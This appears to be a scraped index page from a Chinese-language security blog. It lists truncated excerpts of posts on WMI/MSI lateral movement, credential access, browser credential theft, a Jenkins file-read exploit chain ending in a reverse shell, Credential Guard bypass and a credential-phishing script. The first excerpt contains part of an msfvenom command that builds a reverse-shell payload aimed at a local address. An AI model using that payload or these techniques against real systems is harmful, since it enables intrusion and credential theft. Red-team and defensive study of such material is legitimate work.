执行在 MSI(Microsoft 安装程序包)中生成恶意负载:攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...
04月19日2 views评论wmi
横向移动
红队战术 - WMI + MSI 横向移动
04月19日2 views评论wmi
横向移动
04月19日2 views评论wmi
横向移动
ATT&CK - 凭据访问
Credential Access Credential access represents techniques that can be used by adversaries to obtain ...
04月15日ATTACK4 views评论credential
network
ATT&CK -
Web浏览器凭证 攻击者可以通过读取特定于目标浏览器的文件来从Web浏览器获取凭据。 Web浏览器通常会保存凭据,例如网站用户名和密码,以便将来无需手动输入它们。Web浏览器通常将凭据以加密格式存储在...
04月15日ATTACK1 views评论credential
ers
基于Python的Snake信息窃取器攻击Facebook用户
Facebook messages are being used by threat actors to a Python-based information stealer dubbed Snake...
03月10日16 views评论telegram
恶意软件
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
一、前言本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文...
03月05日59 views评论任意文件读取
反弹shell
网络安全机构发布警告:APT28的MooBot威胁
In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries a...
02月29日25 views评论cyber
route
黑客利用开源SSH-Snake工具进行网络攻击
A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors t...
02月23日12 views评论struct
网络攻击
复现一个有争议的安卓漏洞,是严重还是中危?是权限提升还是信息泄露?
本文继续为大家带来安卓漏洞的分析和复现。这次分析和复现的是 CVE-2023-40076。为什么有争议呢?请大家跟随分析过程往下看。漏洞信息描述CVE-2023-40076风险级别:X漏洞类型:信息泄...
02月19日19 views评论credential
信息泄露
Cloudflare泄露:国家级黑客入侵并获取源代码和内部文档
Cloudflare has revealed that it was the target of a likely nation-state attack in which the threat a...
02月03日43 views评论atlassian
cloudflare
内网信息收集备忘录(下)
Part1 前言 大家好,我是影流团队的WuWuWu。接内网信息收集上篇,本期分享内网信息收集下篇。 Part2 远程桌面RDP查看在本地机器连接过的其他机器命令(1)regquery "HKEY_...
01月11日安全文章8 views评论credential
mimikatz
绕过Credential Guard 读取明文凭据
Tips +1 前言 Windows 10 之前,Lsass 将操作系统所使用的密码存储在其进程内存中 当我们获取到机器权限后,经常使用Mimikatz在机器上获取各种凭证,包括明文密码,NTLM哈希...
12月21日21 views评论defender
进程
带有 HTTP 请求的 CredentialsPhish
因为 nishang 中的 Invoke-CredentialsPhish 只能将用户名和密码输出显示, 所以就自己改了改. 未指定参数则默认保存在 c:\windows\temp\creds.log...
12月15日安全博客12 views评论invoke
prompt